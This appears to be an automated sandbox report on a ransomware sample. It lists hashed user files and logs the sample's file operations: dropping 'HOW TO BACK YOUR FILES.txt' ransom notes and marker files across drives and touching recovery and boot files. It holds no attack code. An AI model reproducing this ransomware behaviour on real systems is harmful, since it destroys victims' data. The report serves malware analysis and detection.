C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml 92.44 KB MD5: 30687d1717f6cf892fbb1c2b6997ec06
SHA1: 4848aacfc37a4f9aeb4b681c30344bc91490f21f
SHA256: de1ec0145bbad6fda20c6e1f7dcc5900a4c485eebd40f39f179a2be18ea2e25e
SSDeep: 1536:ZPwKP4aoqmDiVO5p2synEcJoRHMI5jcnCYUCmnNluG27nGz44DgPfSAfsC98Gixm:ZFoqmeQ5pyducnCYUzGzIcPqNo/Be8nH
False
C:\Windows10Upgrade\resources\amd64\nxquery.cat 10.44 KB MD5: 38aa95d43db67faef320def98ba7820f
SHA1: e0c318147b9a803161540e1ccabf71722b5572ac
SHA256: 592f8dab73770ec592f1aea83d3f943d8971f4cf9e7242973b5cc8e6245b4c1b
SSDeep: 192:L6LZMQMmaR4+m1z6Nw9BBKIgtsn+edIvNFNY1wNXl0CfO3KMlf:L6cmaRzV+BiCr8NFVNXOC0D
False
C:\Users\Public\Libraries\RecordedTV.library-ms 1.69 KB MD5: 3a0cf070f1747909366e50dc3cc6752a
SHA1: f232c28699203b1d7423e22bce5e7a73cc469793
SHA256: 9f0cf20f2564f4f9adcbb81be4f71ac4245ad716e850dc3e358c6f581d8926cd
SSDeep: 48:o9c+U6RW68PDE5sVsZgO+MWPMK/nkKT4dLHM7Nvf:Ic+U66DSuRO+fMK/b4pM7Nvf
False
C:\Users\FD1HVy\Videos\7GblG1j-U_m.avi 88.17 KB MD5: a10088f65955c5de0729efad11e8ccba
SHA1: 25846f959927cedc698647caa5527a43a27e11bc
SHA256: ddb13facde237d0d5ee15bf13cf162f48cc2ff2960f2e0496c84e20bc87a1a4d
SSDeep: 1536:YIsYodbiu3XENZXoLVTPl0bEu+Y1rScd/W40QgUxkSH3zznZhR562KEr2/CVxL:Od2unQwebf+Iru40QgUx1H3zrZhDJK0V
False
C:\Users\FD1HVy\Videos\tKr\hafWBqXU o.swf 56.86 KB MD5: 46829d6aa2571dffede823e98527b34d
SHA1: 73896760bf67ddc701d0d72dcee8b3b419a6739c
SHA256: 1f27eef57ec4430d82378839616fec5726b13c0dab172e7b181881c9f37956a6
SSDeep: 1536:lqHEwx3BYzspz65AoldTdrWP3T6DFO9gpXIxyjZn5:YHEFc65AyYP3ODFnpXPZn5
False
C:\Users\FD1HVy\Videos\tKr\LgD6JoRdSVkauQ4AZ.mkv 66.03 KB MD5: fc7f2e5a8a9c8f279b32ad2ee2ecd7c2
SHA1: 42ffe78d6d61873c52de1735df2c8ee941c1a2c1
SHA256: 4c93278feb29ff18036d196c0bb65ddb78c20ce91810e4ea49222f8669c88c74
SSDeep: 1536:Oor8mg3yBdnXNIvKUjfLgXCz4NRXXmKMT7EyFcrnt/Zaghk6Z5AktIA:pXQyrXNIC+doRHmKw6h/ZHAPA
False
C:\Users\FD1HVy\Videos\tKr\p_iTlT1Y7Bmx3OF.swf 90.05 KB MD5: 64213512857e37c1429bcfe94dae6099
SHA1: 330844dc1596237b48af1ac7ed7ac69516609da0
SHA256: 76167e250d0f40e2a71ece126beefe26dd51e3e864e5c8526c57178c4e3afd16
SSDeep: 1536:qPQLuFgcBPBounK+qucfSy/TA4J7B6T5wCVAaxeGHyhtRHlNv60Iwh:eQLuFxBpK+quwSoTAO7BOvVASQHlNv60
False
C:\Users\FD1HVy\Videos\tKr\SOffZObMNcI-W_M.mkv 90.19 KB MD5: a41e45e5cf3c708cdff5d62994d5c42c
SHA1: 495b3fa1caadb2ae84ea063abe8522798f17256f
SHA256: f7377ea7609f06b37997ba49c6a0fcfaaa1eaed0a9b4dcc353a0c11b9c73ebfc
SSDeep: 1536:epwp/r7/Z2KETRCcdGzpS58ujjmjXyiYO5gQaifPriY2DNefZ0xZCxXkdBKiJQEB:epwZhTEMcdGl9u/6hByDIfZ0xmUzliEB
False
C:\Users\FD1HVy\Videos\tKr\VCm0_y.mkv 26.73 KB MD5: 3507b59780f9c945e9607ff7524a8302
SHA1: 481a97e313a5ae7606357b45c259838084bf147b
SHA256: 7881d675cfdee8ef6fdbb799c5b6cebff436197930914da1b36372de455c15e2
SSDeep: 768:N+/EYyJhkHp2fLnA/vdGefwk18eSStO/1gZzDq:dHDOOLkdGeok1FSqO/kzDq
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\1NoZ-i.avi 84.56 KB MD5: 1847c028d89ad83fb07de6685a8aec00
SHA1: eaf76c48a0204d25c53dfbb747a51b754d96a92f
SHA256: ca2643c7ea71bc3afff3b15ca265af6ec20629f8878e02671b9315779493cd10
SSDeep: 1536:05o1tLBcubST43AXvGGCI1WSnfgfzPciS5IILuMhfDIdXMpY1BcH75WgBi:XBckSU3ihX1ZW0iSqIKa0IYPcdc
False
C:\Users\FD1HVy\Videos\Kagr0\BDCHN3cxOVU.avi 81.92 KB MD5: 86cb85d3a194c1340d1907b4a3dfc9c6
SHA1: a19b46889387ba23f8ffcc457b47ad1fee344305
SHA256: ab5c38b84337fdf241718d83727f3cc53ee5f13f7d1b261e0d36f88101d6b2ba
SSDeep: 1536:e6iE8sAKV8zOgP2Up4uL4zZi7Ix9Z+vKQiFnULSNrt4z9VitXwB:LDAKVXgh4uLoZi7IF+vKQWnU+Nryz9Vp
False
C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf 52.02 KB MD5: 75b84616257e1b9eb52f50d3773a7381
SHA1: ef68dc0408b1cefd2e4b118cf3a1989d67d4b7fe
SHA256: e6dab498c7aa96eeb018991a5df84b14e8a374e8177c80026b3f265d17470c26
SSDeep: 1536:7OBQvIRwYL2pWgAWHfo6BEUuy7WSeGj4JsmN1:7OBQvIv2pWgnHfo6Biy7Wvjr
False
C:\Users\FD1HVy\Videos\IGecK\WwiHK0yV6.flv 42.84 KB MD5: 6d80c106e20b8858c01f7c54675bb76d
SHA1: 21488a16c0b5cfc29926eccb2c57c8fb30cf4a52
SHA256: d1e526e3d6b511e996dbebc4cb4ba2b3a856e448d11cd3d487a2333ad6bf98a2
SSDeep: 768:fQoosXowKsQjrTpdBhi16UQvGcxqxnNgjLQ6EbH1Qs367YpIsEQRw:fI+VQjrTvxUOGaSNfJbVD3SYpIsBRw
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\2SeeX7efa.avi 43.77 KB MD5: d1a72a27141ace08a7020d2911fbebd3
SHA1: 752a0faf36b2156c36b7d552a5aafa67810eb076
SHA256: 680b7ec4c4f649253e29edd5c2afd1734755f2ddbe391fdca70af2c7bee8a203
SSDeep: 768:OLa+2+dEtCW/tLyDY9hFqkaKGV59phss54msJlTaHvmtLzmmvvBfq5j:O2+2+it9/sDYgk259pSmssvOmcvt6
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\Hs7jFAf-QpkayKL1.mp4 98.72 KB MD5: 27ad9de328a241bf5a55f1e5376f1e3b
SHA1: ee1bbc590f37fc21a7a23ce991acb4c2d2875ee8
SHA256: b54097dbcecb5e8bbe8d693e0c3869b1c8098200a6fc1a4974c1b905bb82b10e
SSDeep: 1536:D7DRqzbV/JFOUaulHF4v7bDMSezx520yo/9LoZ97QEIQevWkhkf8ckdmV37/Weoo:fD8dOAHF2gtzxU8ezIvWtqQrFv
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\rGivFa1k09POnyHrPjNR.avi 53.41 KB MD5: c424f1007c8c56871ead0ba8b97a645a
SHA1: 1dbf79681bddc4ab4a2fef6c9eb782830be32898
SHA256: 69ed2fd549c78f2969c0e71a383151aac453389cb2e432c1531e9eb39163b3ac
SSDeep: 1536:6iEJcNNLMATOn/OWlmfjtc3RKoTZM9xpqDQ8nvz9Q:9EiNoATOn/OWlmSKoTurSj9Q
False
C:\Users\FD1HVy\Pictures\1duD457p.jpg 98.75 KB MD5: 9045adf0c3b9fd395b8575851aaea68c
SHA1: 982b0f398c05ed770998cc5a653f352650462760
SHA256: d58f938f25d4c7f9c0697bf028fcb992aac9cb3c0e0729a33b91e2b755f8554e
SSDeep: 3072:9mbm+vfhcMMHWFNvls1v9Av2961Y+o8LLw:9KmQZNDvla2+2o8L0
False
C:\Users\FD1HVy\Pictures\4JN5OJk27EA8luclUdN4.jpg 46.14 KB MD5: 514c73b27d043808154c65fdbca0abc3
SHA1: 060160c4a02a5b35773bcfd37a276e61927cefa7
SHA256: 8beea1d183618bc14c4003d391af451616f6d0b100027f390462fc0f7bee7c83
SSDeep: 768:fVqlrPzqgaMyfO7mKO2uXulezVLG7Q9IIuL9Yjng5t3vCIFqKLuG3Qih7Ed1jpCP:dIPzqgaoaP2iusk09OBYkvhFeGAnddp+
False
C:\Users\FD1HVy\Pictures\7snkBq.bmp 22.77 KB MD5: 1adf6f7764f53151762d4fd9af035962
SHA1: 164fe6bc6a30c54afdaf0c77505e7100ee9ad122
SHA256: 94948c51d02e2e9f1c0b63295a35b07629b8d9ad846b8e0119466011e4974947
SSDeep: 384:TM+/9lqP/ktAWqOyGzvT/323GJ1Jzb5qaQCIIb78e8OZswkONbHD8Ov:TGObvTsI1Jzlq5CIUCOswkcTv
False
C:\Users\FD1HVy\Pictures\7V2nOIAHdw9cQ.bmp 68.22 KB MD5: 2b15e5567dede3e84ff37099523a355a
SHA1: a07ca96cc6f7bb2a60e33221a92dddd3e49d408b
SHA256: db3ed41f01316d737cc0bc9c0480ff823f961da0c5975b31da20d9a58ffe6e5e
SSDeep: 1536:ZqFeP4BMi5DBC3hsNX5jZCCuOf4nICx/aQPDhS3ao:ZJwB9DBCxsNX5Nv1fzC5PPD1o
False
C:\Users\FD1HVy\Pictures\Ce1PVVjhKneKv.jpg 25.62 KB MD5: 47457e64f2ed5077d0a2c33d47e9a8a0
SHA1: de69962b364fd549db03c1f469aecfcfd92883b5
SHA256: ed08cecb5b7a4008eb9bd141b1b169ba33f61150cabd9b95d3488043f436497f
SSDeep: 384:pqRwexM2c10lxQTxq9A0Ir2nIggUgjit5NJ1+1WZMADdHyjQSyFYGNdrKRFMZvO:IbxxoIKxqnISnIIki5gWZMARB7Zo
False
C:\Users\FD1HVy\Pictures\D tDC8K.jpg 70.62 KB MD5: d6e804ebf485d925d538c282c5d97016
SHA1: 7faf24133385dbe85b6222662192e72f052238a9
SHA256: 2ad1597f14c14f7dbea9dd97a8c2277933942b8aa50a165b62903fabc38c4a72
SSDeep: 1536:EYGUfKZVBai9LND71C4dhU+ZN0UQg5lnEmky3t22zqvtakSYMRl7Cl:KUfKZOif7ddPJE/y3nzqUkSX7Cl
False
C:\Users\FD1HVy\Pictures\Ir5ZI.bmp 29.03 KB MD5: b91e66128642d3ad6439a43fb232104c
SHA1: e0da0084436dd7d86edf4ac4daed887a83857620
SHA256: cc28f604ae012b2abd8ed1525216ec8d0eca30feddc81514c3a8f2509ff8db36
SSDeep: 384:uAy6R/bzDLsw/MciSUedef/k65InlOxCW8b+5vDTZxiu23Bx0jngJlc3IGFDbztH:hR/bzDVMv//5IZVyPo/Run33JztH
False
C:\Users\FD1HVy\Pictures\jpJ811wuLbp.bmp 24.45 KB MD5: 46f7d57fd4eacb9d2a51825f3186ea44
SHA1: 6e7377b0b975696d4e6399477195cd878f40ca7e
SHA256: a02a7048234c3dbb3ac1344dcdcd262a221cca5abe6497e88020827ba1ac8250
SSDeep: 768:FQhNX1/Xw506j5y8sVMFHiVZoQLxdQlyKmb:FsX800Zy+iVZ/Xb
False
C:\Users\FD1HVy\Pictures\Y0AydhkNNUR2.jpg 21.14 KB MD5: 46f958beaa08031e1f81ccd607f7a956
SHA1: b973189ee378d52e6a75de8b7de3b5bd11833c63
SHA256: a630293fdb2c0d6ecaeda9b6355ff6ecf19fbd897e3f3c35f9e982c62755ea3e
SSDeep: 384:eQXJY4X22Cf/EvMeDAauPs67z1kwQ3l0m20bv/Tqgy+1Y9Xp/0AW9AJ8gdmmYk:eQXe8Cf/EvMta897z1y3lQi/TqgIXp/V
False
C:\Users\FD1HVy\Pictures\YGhL_kMC_eqFIP.gif 74.05 KB MD5: 755146f87d310f67426320d952cb42fe
SHA1: 2e98ce8df9fe5407dfc9fcf55642308cb685c032
SHA256: 64b7b91411586b74d07e4151b6fcaf6d78c139b4fdecbffa65bc390c1283dad6
SSDeep: 1536:u7VrhDtrgUI9buTCtSUK87XpGhXhmPgTqfksf+AdfWpdZ:u/D5RIKCtSUK87XUhcPgufkI5dfWpdZ
False
C:\Users\FD1HVy\Music\5oW38z-l_J.m4a 20.81 KB MD5: aa4bd9a84baa5d360021b5a8301e7433
SHA1: 2864c6eb1446d1cd87e393d5c0495186f43a6ba7
SHA256: 46537c541ab5d18c9c623c026fe83dd4a44545f6a0626a32d3d52e49dd24c810
SSDeep: 384:LDdevVsbURjtVFkO7nV0hY1M+Z/m3yvO7XnDuXu/YT2rnWAxDz/gTyqv:cvVswUO7V0KReaOrn6ebW6jqv
False
C:\Users\FD1HVy\Music\J42Z.mp3 68.67 KB MD5: cc9a681d985d4844355ecaeb1b290b87
SHA1: c435c30a8dd4d8c17ac3354827adeb25465a96ac
SHA256: 49c72c292be74926656072052116b0c861a4c4669f22fc4e5584012a8d7fb494
SSDeep: 1536:XRmVVy891BjIjMn2lTMQ6k2R075VLfr1pIfyIW1LjDs8gPU+keOwnBA0:cVVy6DMvlT/5VLfr1pIfyI6+keOx0
False
C:\Users\FD1HVy\Music\_Z19.mp3 69.97 KB MD5: 822a538b165a505bfafdaaa09a7fb1f0
SHA1: 53d41956d69c60ec9d5cf25aa99a8ef89e0f2870
SHA256: fdcefb2e1fa08dcc60bbaa07f4c08886976f0de4216dc5a11976f0ce26077426
SSDeep: 1536:BrAqsZpXXDzr84v0s/z/0x6NoW67H1z1EpZUmoeCM:mhRXnr8NsYxgot1ziTVV
False
C:\Users\FD1HVy\Music\Ps7z1Y\DFuSzaknIrmv.wav 60.11 KB MD5: 19c816337abc5b1b3838628b9002b9c3
SHA1: 63009f4f3e9ef75efb392ab62cc4cf1c47f9c429
SHA256: 48dc0bea7200e7a40d91e2a72081da011187419c2ade351389ed13dd65736155
SSDeep: 768:GDsh6CXzlkXkDjcARQ60qt2WQ/qekYlNoHEgEom99Cw/T6bN+fLBdWgY+YtZx+i8:AslXz+0DgAMqBuIEoYqRSBd+tvx+NPWO
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\VF2Fp5QeqqLYfl8gl.m4a 42.58 KB MD5: 521c7357e53dc1196baeb9f3eb7677e0
SHA1: 23f92561e805820f0212c47a4e947ce2b67d11a1
SHA256: 8a535466085edcf3a888292bc9db00c63c4be0c01d62d65cd9fbce5e3ab60a60
SSDeep: 768:ENCmZ5+VV2Sa/H2YwZMh1E0aXbXBbRid6paFjtlLMt8fGdjQD9eg3dmV3E8muTIu:VNVP+3wFxXrBbRidcarlLMSf+2AokVU4
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\ahtik 3dEIDK LesPgbT.mp3 67.27 KB MD5: bbeee4d4e089bb6b101a25590cc4a3e7
SHA1: 93e4582f48c5ae9e694161de3281738f7660794b
SHA256: b75b72c26e5d8f769dd6cc448dd3edaf291bf229b7719601bad5c924828ac5ae
SSDeep: 1536:Q+lEKkOZgm+x9bowyNj24pVxVEcdUxUfd5W6eKhmSk:eV7mpbjLxycdUxUfd55C
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\oJFUvhouKderw.m4a 58.22 KB MD5: 5272d20558e61c0c24276e6b87a4e216
SHA1: 8e44b3972e0e9096f6583157362ad11dcc1c96b7
SHA256: 6d4de9de5a70e16c4cab322ac7fa5e5d9e60aba4ea98d8419e5d8b061e9a9c2b
SSDeep: 768:Z4BJBWIgVTOXRWzheztcWUM+6GCj1+Z/1esIbhKjM/g8Tm7be3ZGakC4ct:ZcHWzT0ztbUB6V86hhKjM/7PZGaT7
False
C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\SiPc-hdOB.mp3 64.58 KB MD5: 44390fa401217effd2ef2f3249f3f14a
SHA1: f8604caac61912983ed0a72c80db2882fd18e2d7
SHA256: 79c68e47e7dcc4cc1131f89d41ea44e5d2d29ec5147f12a0dae56e508a127edc
SSDeep: 1536:LFB4/U+kHmc7d5uwbHOOBd7czLmE5kohD8UOQ9eBSN:Q/BkBPuOH7czLmzoheQ9eBA
False
C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\G_JtWgQVBTJ7M2pd_.m4a 18.77 KB MD5: 42def0427dbe41f4f92d1c3110be3719
SHA1: f56afdd3c40466748599b5bb108603e4ed3aca06
SHA256: b4acf999dca52aa5e9e9c277d88512c92c7c5d7b58831c8d49588d9dc350afc2
SSDeep: 384:KS5kOtsmVZvifIQzz+u3kkk4jfYfDbt8HtneMQx8Yv4cJ9E8xGSFfY:KJ2VaZn/3dkUfYv+Htetb4cfEgGSq
False
C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\dhAbWJ5UgoBr80.wav 9.11 KB MD5: 3b6397a69f3f3fa8a0c508dcfa4c23a7
SHA1: 588b1a1046f1f765d983208cf8971c95b6238477
SHA256: 85a4fcedc1d925ccd869f9dbb9e3f2d43736a7d15e5e0e8fafd4882dcd65822a
SSDeep: 192:1fR1g/GGj1qWFytMBkasHWyavs7ABwELRm9S5PvxMflzW575TTdWY00VMlf:n1ZdnWhtm9Sby8RTS0+
False
C:\Users\FD1HVy\Music\ddgoRP\3faLNgmV.wav 92.88 KB MD5: 9acfd2c5d9e88886f81b2b330c8261be
SHA1: 654ce8606288ec72ae4df847209a9b19685df488
SHA256: f4d781fae87964381635149c4d5c2ccee3950450c302b3766177def3ebbf937e
SSDeep: 1536:52HIIV1qvQE3uC/9B/UJ8rtyMzHmEPHltWxoWTzM8WtE1wRxO2JI3t8Jbn7JHX:EoC1cpuCf/U4tyEmqaTQ/tEaRxrEu7pX
False
C:\Users\FD1HVy\Music\ddgoRP\nMGREfCTbmqLn8Nm.wav 22.70 KB MD5: 5858e73016aa792c4f300ca5e2bd8f1c
SHA1: a8a8a233ce301672f69e9f2ff746292ed1867827
SHA256: caded0eaeda3eeeea42b4791372287e6645eaced8255262e86dbacab9f5a6037
SSDeep: 384:oMu9wEvojOND5iF1+YeEEIFZmj+NPpbfx/AHud5Y18IS+Wmjf6xYQGgneAS:Hu2EvoFn+3qFQjSxfJAHu5Y1v3WmjpQk
False
C:\Users\FD1HVy\Favorites\Bing.url 976 bytes MD5: bad99fd16c77c9cda31b4e6b42162487
SHA1: a6c0762bd00c8817ddca8c54da0238019fbd1c03
SHA256: d64687d391d8d9398ea6bb490ebfcda70b5a191c2cfbbbca299f3880fbc6fd8f
SSDeep: 24:H+aVYG2hlfaLJFoIhD7UmOt3W9+93LnszrS8GPXf:e3b0vvhnHM7Nvf
False
Host Behavior
File (3879)
»
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\local\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\local\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\share\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\share\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\System Volume Information\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\System Volume Information\tracking.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\System Volume Information\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\BOOTNXT desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\BOOTSECT.BAK desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 31
Fn
Create C:\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\bootsect.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll1\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\DW20.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create Z:\Recovery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\Recovery\WindowsRE\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\boot.sdi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\DWTRIG20.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\ReAgent.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\Winre.wim desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\EnableWiFiTracing.cmd desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\GatherOSState.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\GetCurrentRollback.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\HttpHelper.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\PostOOBEScript.cmd desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\upgrader_default.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\upgrader_win10.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
